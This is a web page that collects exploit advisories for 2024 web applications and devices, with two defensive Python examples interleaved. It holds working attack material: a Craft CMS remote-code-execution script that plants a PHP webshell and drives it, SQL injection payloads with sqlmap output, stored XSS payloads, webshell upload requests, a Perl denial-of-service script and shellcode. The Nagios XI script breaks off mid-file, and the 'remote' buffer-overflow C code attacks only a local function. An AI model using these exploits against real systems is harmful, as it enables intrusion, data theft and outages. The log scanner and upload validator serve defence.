All posts published by ISHACK AI BOT
-
CSZCMS v1.3.0 - SQL Injection (Authenticated)
# Title: CSZCMS v1.3.0 - SQL Injection (Authenticated)
# Author: Abdulaziz Almetairy
# Date: 27/01/2024
# Vendor: https://www.cszcms.com/
# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Reference: https://github.com/oh-az
# Tested on: Windows 11, MySQL, Apache

# 1 - Log in to the admin portal http://localhost/cszcms/admin/login
# 2 - Navigate to General Menu > Member Users.
# 3 - Click the 'View' button next to any username.
# 4 - Intercept the request

GET /cszcms/admin/members/view/1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdss
Upgrade-Insecure-Requests: 1

# 5 - Modify the parameter /cszcms/admin/members/view/1 to /cszcms/admin/members/view/'or(sleep(10))# and URL-encode all characters:
/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20
-
minaliC 2.0.0 - Denial of Service
#!/usr/bin/perl
use Socket;

# Exploit Title: minaliC 2.0.0 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 03 January 2024
# Vendor Homepage: http://minalic.sourceforge.net/
# Notification vendor: Not reported
# Tested Version: minaliC 2.0.0
# Tested on: Windows XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Video: https://www.youtube.com/watch?v=R_gkEjvpJNw

#1. Description

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.

#The server did not properly handle requests with large amounts of data sent via the GET method to the web server.
#The following request sends a large amount of data to the web server to process via the GET method; the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

# $^O reports "MSWin32" on Windows (the original compared against "windows", which never matches)
$sis = "$^O";
if ($sis eq "MSWin32") {
    $cmd = "cls";
} else {
    $cmd = "clear";
}
system("$cmd");

intro();
main();

print "[+] Exploiting... \n";

my $junk = "\x41" x 245;
my $host = "\x41" x 135;
my $i = 0;

# Send the oversized GET request four times
while ($i <= 3) {
    my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n";
    my $sock;
    socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n";
    my $addr = sockaddr_in($port, inet_aton($ip));
    connect($sock, $addr);
    send($sock, $buf, length($buf), 0);
    $i++;
}

print "[+] Done - Exploited success!!!!!\n\n";

sub intro {
    print "***************************************************\n";
    print "*        minaliC 2.0.0 - Denied of Service        *\n";
    print "*                                                 *\n";
    print "*           Coded by Fernando Mengali             *\n";
    print "*                                                 *\n";
    print "*      e-mail: fernando.mengalli\@gmail.com        *\n";
    print "*                                                 *\n";
    print "***************************************************\n";
}

sub main {
    # package variables so the while loop above can read them
    our ($ip, $port) = @ARGV;
    unless (defined($ip) && defined($port)) {
        print " \nUsage: $0 <ip> <port> \n";
        exit(-1);
    }
}
-
Craft CMS 4.4.14 - Unauthenticated Remote Code Execution
#!/usr/bin/env python3
#coding: utf-8
# Exploit Title: Craft CMS unauthenticated Remote Code Execution (RCE)
# Date: 2023-12-26
# Version: 4.0.0-RC1 - 4.4.14
# Vendor Homepage: https://craftcms.com/
# Software Link: https://github.com/craftcms/cms/releases/tag/4.4.14
# Tested on: Ubuntu 22.04.3 LTS
# Tested on: Craft CMS 4.4.14
# Exploit Author: Olivier Lasne
# CVE : CVE-2023-41892
# References :
# https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
# https://blog.calif.io/p/craftcms-rce

import requests
import sys, re

if(len(sys.argv) < 2):
    print(f"\033[1;96mUsage:\033[0m python {sys.argv[0]} \033[1;96m<url>\033[0m")
    exit()

HOST = sys.argv[1]

if not re.match('^https?://.*', HOST):
    print("\033[1;31m[-]\033[0m URL should start with http or https")
    exit()

print("\033[1;96m[+]\033[0m Executing phpinfo to extract some config infos")

## Execute phpinfo() and extract config info from the website
url = HOST + '/index.php'
content_type = {'Content-Type': 'application/x-www-form-urlencoded'}
data = r'action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}'

try:
    r = requests.post(url, headers=content_type, data=data)
except:
    print(f"\033[1;31m[-]\033[0m Could not connect to {HOST}")
    exit()

# If we succeed, we should have default phpinfo credits
if not 'PHP Group' in r.text:
    print(f'\033[1;31m[-]\033[0m {HOST} is not exploitable.')
    exit()

# Extract config value for tmp_dir and document_root
pattern1 = r'<tr><td class="e">upload_tmp_dir<\/td><td class="v">(.*?)<\/td><td class="v">(.*?)<\/td><\/tr>'
pattern2 = r'<tr><td class="e">\$_SERVER\[\'DOCUMENT_ROOT\'\]<\/td><td class="v">([^<]+)<\/td><\/tr>'

tmp_dir = re.search(pattern1, r.text, re.DOTALL).group(1)
document_root = re.search(pattern2, r.text, re.DOTALL).group(1)

if 'no value' in tmp_dir:
    tmp_dir = '/tmp'

print(f'temporary directory: {tmp_dir}')
print(f'web server root: {document_root}')

## Create shell.php in tmp_dir
# (raw string: the original used a plain string, whose backslash sequences Python warns about)
data = {
    "action": "conditions/render",
    "configObject[class]": r"craft\elements\conditions\ElementCondition",
    "config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/etc/passwd"}}}'
}

files = {
    "image1": ("pwn1.msl", """<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="caption:<?php @system(@$_REQUEST['cmd']); ?>"/>
<write filename="info:DOCUMENTROOT/shell.php"/>
</image>""".replace("DOCUMENTROOT", document_root), "text/plain")
}

print(f'\033[1;96m[+]\033[0m create shell.php in {tmp_dir}')
r = requests.post(url, data=data, files=files) #, proxies={'http' : 'http://127.0.0.1:8080'})

# Use the Imagick trick to move the webshell in DOCUMENT_ROOT
data = {
    "action": "conditions/render",
    "configObject[class]": r"craft\elements\conditions\ElementCondition",
    "config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:' + tmp_dir + r'/php*"}}}'
}

print(f'\033[1;96m[+]\033[0m trick imagick to move shell.php in {document_root}')
r = requests.post(url, data=data) #, proxies={"http": "http://127.0.0.1:8080"})

if r.status_code != 502:
    print("\033[1;31m[-]\033[0m Exploit failed")
    exit()

print(f"\n\033[1;95m[+]\033[0m Webshell is deployed: {HOST}/\033[1mshell.php\033[0m?cmd=whoami")
print(f"\033[1;95m[+]\033[0m Remember to \033[1mdelete shell.php\033[0m in \033[1m{document_root}\033[0m when you're done\n")
print("\033[1;92m[!]\033[0m Enjoy your shell\n")

url = HOST + '/shell.php'

## Pseudo Shell
while True:
    command = input('\033[1;96m>\033[0m ')

    if command == 'exit':
        exit()

    if command == 'clear' or command == 'cls':
        print('\n' * 100)
        print('\033[H\033[3J', end='')
        continue

    data = {'cmd' : command}
    r = requests.post(url, data=data) #, proxies={"http": "http://127.0.0.1:8080"})

    # exit if we have an error
    if r.status_code != 200:
        print(f"Error: status code {r.status_code} for {url}")
        exit()

    res_command = r.text
    res_command = re.sub('^caption:', '', res_command)
    res_command = re.sub(' CAPTION.*$', '', res_command)
    print(res_command, end='')
-
SPA-CART CMS - Stored XSS
# Exploit Title: SPA-CART CMS - Stored XSS
# Date: 2024-01-03
# Exploit Author: Eren Sen
# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/
# Version: [1.9.0.3]
# CVE-ID: N/A
# Tested on: Kali Linux / Windows 10
# Vulnerabilities Discovered Date : 2024/01/03
# Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: descr
# Proof of Concept: demo.spa-cart.com/product/258

# HTTP Request:

POST ////admin/products/258 HTTP/2
Host: demo.spa-cart.com
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx
Content-Length: 1906
Sec-Ch-Ua:
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Sec-Ch-Ua-Platform: ""
Origin: https://demo.spa-cart.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.spa-cart.com////admin/products/258
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="mode"


------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="sku"

SKU386
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="name"

asdf
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="cleanurl"

Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="avail"

1000
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="price"

0.00
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="list_price"

2
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="weight"

0.00
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="categoryid"

42
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="categories[]"

8
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="categories[]"

37
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="brandid"

4
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="status"

1
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="keywords"


------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="descr"

<script>alert(1)</script>
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="title_tag"


------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="meta_keywords"


------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="meta_description"


------WebKitFormBoundaryUsO8JxBs6LhB8LSl--
-
Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS
# Exploit Title: Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS
# Date: 2024-02-08
# Exploit Author: Hakkı TOKLU
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Version: 1.0
# Tested on: Windows 11 / PHP 8.1 & XAMPP 3.3.0

Support Ticket

Click on Support Tickets > Generate and add payload <img src=x onerror=prompt("xss")> to Subject and Description fields, then send the request. When admin visits the Support Tickets page, XSS will be triggered.

Example Request :

POST /e-insurance/Script/user/core/new_ticket HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15; __insuarance__logged=1; __insuarance__key=LG3LFIBJCN9DKVXKYS41

category=4&subject=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&description=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&submit=1

Create Account

Click on New Account button on login page, then fill the fields. Inject <img src=x onerror=prompt("xss")> payloads to fname, lname, city and street parameters, then click Create Account button. XSS will be triggered when admin visits Users page.

Example Request :

POST /e-insurance/Script/core/new_account HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 303
Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15

fname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&lname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&gender=Male&phone=5554443322&city=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&street=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&email=test1%40test.com&password=Test12345&submit=1
-
MobileShop master v1.0 - SQL Injection Vuln.
+ Exploit Title: MobileShop master v1.0 - SQL Injection Vuln.
+ Date: 2024-13-03
+ Exploit Author: "HAZIM ARBAŞ" from EMA Security LTD - Siber Güvenlik ve Bilişim Hizmetleri (https://emasecurity.com)
+ Vendor Homepage: https://code-projects.org/mobile-shop-in-php-css-javascript-and-mysql-free-download/
+ Software Link: https://download-media.code-projects.org/2020/04/Mobile_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip
+ Tested on: Windows 10 Pro
+ CWE: CWE-89
+ CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ Type: WebApps
+ Platform: PHP

## References:
+ https://cwe.mitre.org/data/definitions/89.html
+ https://owasp.org/Top10/A03_2021-Injection/

## Description:
The MobileShop-master application is susceptible to SQL Injection through the 'id' parameter in "/MobileShop-master/Details.php". Exploiting this vulnerability could lead to severe consequences, including unauthorized access, data manipulation, and potential exploitation of other vulnerabilities within the underlying database. It is imperative to address this issue promptly to mitigate the risk of compromise and ensure the security and integrity of the application and its data.

## Proof of Concept:
+ Go to the Login page: "http://localhost/MobileShop-master/Login.html"
+ Fill email and password.
+ Select any product and intercept the request via Burp Suite, then send it to Repeater.
+ Change the 'id' value to any of the below payloads.
+ Send the request

## Payloads:
+ id=1' AND 9071=9071 AND 'EtdU'='EtdU
+ id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk
+ id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
+ Or you can write your own payloads

## Proof of Concept Using SqlMap:
+ Go to the Login page: "http://localhost/MobileShop-master/Login.html"
+ Fill email and password.
+ Select any product and intercept the request via Burp Suite, then send it to Repeater.
+ Copy to File the request to a "sql.txt" file.
+ Run the following sqlmap command
+ sqlmap -r sql.txt -p id --dbs

```
POST /MobileShop-master/Details.php HTTP/1.1
Host: localhost
Content-Length: 42
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/MobileShop-master/MobilesList.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=mh3mnpf51bj2q17hg8sipbltnn
Connection: close

id=1
```

+ Use sqlmap to exploit. In sqlmap, use the 'id' parameter to dump the database.

```
sqlmap -r sql.txt -p id --dbs
```

```
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9071=9071 AND 'EtdU'='EtdU

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7380 FROM (SELECT(SLEEP(5)))rlmI) AND 'blrN'='blrN

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[04:17:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.12, Apache 2.4.58
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:17:04] [INFO] fetching database names
[04:17:05] [INFO] resumed: 'information_schema'
[04:17:05] [INFO] resumed: '1'
[04:17:05] [INFO] resumed: '3'
[04:17:05] [INFO] resumed: 'admidio'
[04:17:05] [INFO] resumed: 'calender'
[04:17:05] [INFO] resumed: 'corregidor'
[04:17:05] [INFO] resumed: 'gym'
[04:17:05] [INFO] resumed: 'joomla_db'
[04:17:05] [INFO] resumed: 'linkstack'
[04:17:05] [INFO] resumed: 'mobileshop'
[04:17:05] [INFO] resumed: 'mysql'
[04:17:05] [INFO] resumed: 'nickey'
[04:17:05] [INFO] resumed: 'performance_schema'
[04:17:05] [INFO] resumed: 'phpmyadmin'
[04:17:05] [INFO] resumed: 'rcms'
[04:17:05] [INFO] resumed: 'smith'
[04:17:05] [INFO] resumed: 'telephone'
[04:17:05] [INFO] resumed: 'test'
[04:17:05] [INFO] resumed: 'valente'
```
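Both the CSZCMS PoC above (a fully percent-encoded `'or(sleep(10))#`) and the MobileShop payloads (boolean, error-based and UNION probes against `id`) leave a trace in web-server access logs, but only after the request target is decoded. The scanner below is an added example written for this page, not code from either advisory; the log lines are constructed (the MobileShop-style probe is shown as a GET so it appears in the path, since access logs do not record POST bodies), and every function name is this example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Common Log Format; not captured from any real host.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jan/2024:10:00:01 +0000] "GET /cszcms/admin/members/view/1 HTTP/1.1" 200 5120
10.0.0.5 - - [27/Jan/2024:10:00:09 +0000] "GET /cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20 HTTP/1.1" 200 5120
10.0.0.7 - - [13/Mar/2024:04:17:04 +0000] "POST /MobileShop-master/Details.php HTTP/1.1" 200 9000
10.0.0.9 - - [13/Mar/2024:04:17:05 +0000] "GET /MobileShop-master/Details.php?id=1%27%20AND%209071%3D9071%20AND%20%27EtdU%27%3D%27EtdU HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators are matched against the *decoded* target. They are deliberately generic:
# a quote followed by a boolean operator or comment marker, timing functions, UNION ... SELECT.
INDICATORS = [
    ("sql-comment-after-quote", re.compile(r"'\s*(?:--|#|/\*)", re.I)),
    ("quote-then-boolean", re.compile(r"'\s*(?:or|and)\b", re.I)),
    ("time-delay-function", re.compile(r"\b(?:sleep|benchmark|pg_sleep|waitfor)\s*\(", re.I)),
    ("union-select", re.compile(r"\bunion\b.{0,20}\bselect\b", re.I)),
]


def fully_decode(s, max_rounds=3):
    """Percent-decode until the string stops changing, so double encoding cannot hide a payload."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_line(line):
    """Return a finding dict for one access-log line, or None if it looks clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = fully_decode(m.group("target"))
    hits = [name for name, rx in INDICATORS if rx.search(target)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "target": target, "indicators": hits}


def scan_log(text):
    """Scan a whole log and return the list of findings in file order."""
    return [f for f in (scan_line(ln) for ln in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['ip']} {finding['ts']} {finding['indicators']} {finding['target']}")
```

Decoding before matching is the point: the raw CSZCMS path contains no quote, no `sleep` and no `#`, so a filter that inspects the encoded line misses it. The MobileShop PoC sends `id` in a POST body, which ordinary access logs never record; catching that case needs application-level request logging or a WAF in front of the PHP app, and the real fix in both products is a parameterised query rather than string concatenation.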
-
LBT-T300-mini1 - Remote Buffer Overflow
#include <stdio.h>
#include <string.h>

#define MAX_LEN 256
#define BUFFER_OVERRUN_LENGTH 50
#define SHELLCODE_LENGTH 32

// NOP sled to increase the chance of successful shellcode execution
// (sized by the initializer so the string keeps its NUL terminator; the original
// declared it as char[32] with 32 bytes, which made the strlen() below read past the array)
char nop_sled[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

// Shellcode to execute /bin/sh
char shellcode[SHELLCODE_LENGTH] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

// Vulnerable routine: strncpy() does not NUL-terminate when the source fills the buffer
void apply_cgi(char *vpn_client_ip) {
    char buffer[MAX_LEN];
    strncpy(buffer, vpn_client_ip, MAX_LEN);
    printf("Client IP: %s\n", buffer);
}

int main() {
    char input[MAX_LEN + BUFFER_OVERRUN_LENGTH] = {0};

    // Create a buffer with the malicious input
    // including the NOP sled, shellcode, and the overflow data
    int offset = strlen(nop_sled) + strlen(shellcode) - BUFFER_OVERRUN_LENGTH;
    strncpy(&input[0], nop_sled, offset);
    strncpy(&input[offset], shellcode, SHELLCODE_LENGTH);
    input[MAX_LEN + BUFFER_OVERRUN_LENGTH - 1] = '\x00';

    // Call the vulnerable function to trigger the buffer overflow
    apply_cgi(input);

    return 0;
}
-
Tourism Management System v2.0 - Arbitrary File Upload
# Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload
# Google Dork: N/A
# Exploit Author: SoSPiro
# Date: 2024-02-18
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/tourism-management-system-free-download/
# Version: 2.0
# Tested on: Windows 10 Pro
# Impact: Allows admin to upload all files to the web server
# CVE : N/A
# Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input.

# PoC request

POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201
Content-Length: 361
Origin: http://localhost
Connection: close
Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1
Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: red

-----------------------------390927495111779706051786831201
Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"
Content-Type: text/plain

<?php phpinfo();?>
-----------------------------390927495111779706051786831201
Content-Disposition: form-data; name="submit"


-----------------------------390927495111779706051786831201--

===========================================================================================
- Response -

HTTP/1.1 200 OK
Date: Sun, 18 Feb 2024 04:33:37 GMT
Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev
X-Powered-By: PHP/8.1.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8146

============================================================================================
- File location -

http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php
-
Wallos < 1.11.2 - File Upload RCE
# Exploit Title: Wallos - File Upload RCE (Authenticated)
# Date: 2024-03-04
# Exploit Author: [email protected]
# Vendor Homepage: https://github.com/ellite/Wallos
# Software Link: https://github.com/ellite/Wallos
# Version: < 1.11.2
# Tested on: Debian 12

Wallos allows you to upload an image/logo when you create a new subscription. This can be bypassed to upload a malicious .php file.

POC
---

1) Log into the application.
2) Go to "New Subscription"
3) Upload Logo and choose your webshell .php
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:

--- SNIP -----------------
POST /endpoints/subscription/add.php HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.44/
Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324
Origin: http://192.168.1.44
Content-Length: 7220
Connection: close
Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light

-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="name"

test
-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="logo"; filename="revshell.php"
Content-Type: image/jpeg

GIF89a;
<?php system($_GET['cmd']); ?>
-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="logo-url"

----- SNIP -----

5) You will get the response that your file was uploaded ok:

{"status":"Success","message":"Subscription updated successfully"}

6) Your file will be located in: http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php
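The Tourism Management System and Wallos advisories above fail for the same reason: the upload handler trusts the client's filename and Content-Type, and Wallos additionally shows that a leading `GIF89a` satisfies a magic-byte check on its own. The validator below is an added example written for this page, not code from either project; the sample uploads are constructed from the bodies shown in the two requests (with `phpinfo()` standing in for the shell), and every name in it is this example's own.

```python
import os
import re
import secrets

# Allowlist keyed by the extension the server will store; each entry carries the
# declared MIME type we expect and the file-header signatures that are acceptable.
ALLOWED = {
    ".png":  ("image/png",  [b"\x89PNG\r\n\x1a\n"]),
    ".jpg":  ("image/jpeg", [b"\xff\xd8\xff"]),
    ".jpeg": ("image/jpeg", [b"\xff\xd8\xff"]),
    ".gif":  ("image/gif",  [b"GIF87a", b"GIF89a"]),
}

# Script markers that have no business inside an image body. A GIF header followed by
# PHP is exactly the polyglot the Wallos PoC uploads.
SCRIPT_MARKER = re.compile(rb"<\?php|<\?=|<script\b|<%", re.I)


def validate_upload(client_filename, declared_type, data):
    """Return (accepted, reason, stored_name).

    stored_name is server-generated, so the client's filename never reaches disk.
    """
    ext = os.path.splitext(client_filename)[1].lower()
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not allowed", None
    expected_type, signatures = ALLOWED[ext]
    if declared_type != expected_type:
        return False, "Content-Type does not match extension", None
    if not any(data.startswith(sig) for sig in signatures):
        return False, "file header does not match extension", None
    if SCRIPT_MARKER.search(data):
        return False, "embedded script markers", None
    stored_name = secrets.token_hex(16) + ext
    return True, "ok", stored_name


# Constructed uploads modelled on the two PoC requests (not captured traffic).
SAMPLES = [
    ("phpinfo.php",  "text/plain", b"<?php phpinfo();?>"),                  # Tourism MS
    ("revshell.php", "image/jpeg", b"GIF89a;\n<?php phpinfo(); ?>"),        # Wallos
    ("logo.gif",     "image/gif",  b"GIF89a;<?php phpinfo(); ?>"),          # same body, image name
    ("logo.gif",     "image/gif",  b"GIF89a\x01\x00\x01\x00\x80\x00\x00"),  # benign stub
]


def run_samples():
    """Validate each constructed sample and return the accept/reject decisions."""
    return [(name, validate_upload(name, ctype, body)[:2]) for name, ctype, body in SAMPLES]


if __name__ == "__main__":
    for name, (ok, reason) in run_samples():
        print(f"{'ACCEPT' if ok else 'REJECT':6} {name:14} {reason}")
```

The order of the checks matters less than having all of them: the extension allowlist alone stops both PoCs as written, the header check stops a `.php` body renamed to `.gif`, and the marker scan stops the polyglot. For image uploads the stronger control is to decode and re-encode the file with an image library so that no attacker-controlled bytes survive, and to serve the upload directory with script execution disabled.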
-
Nagios XI Version 2024R1.01 - SQL Injection
# Exploit Title: NAGIOS XI SQLI
# Google Dork: [if applicable]
# Date: 02/26/2024
# Exploit Author: Jarod Jaslow (MAWK) https://www.linkedin.com/in/jarod-jaslow-codename-mawk-265144201/
# Vendor Homepage: https://www.nagios.com/changelog/#nagios-xi
# Software Link: https://github.com/MAWK0235/CVE-2024-24401
# Version: Nagios XI Version 2024R1.01
# Tested on: Nagios XI Version 2024R1.01 LINUX
# CVE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24401
#

import requests
import subprocess
import argparse
import re
import urllib3
import os
import random
import string
from colorama import Fore, Style

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


# Not called from __main__; relies on a global IP being set by the caller.
def serviceLogin(user, password):
    r = requests.post(f'http://{IP}/nagiosxi/api/v1/authenticate?pretty=1', data={'username': user, 'password': password, "valid_min": "5"}, verify=False)
    print(f"{Fore.MAGENTA}[+] Authenticating with captured credentials to API....")
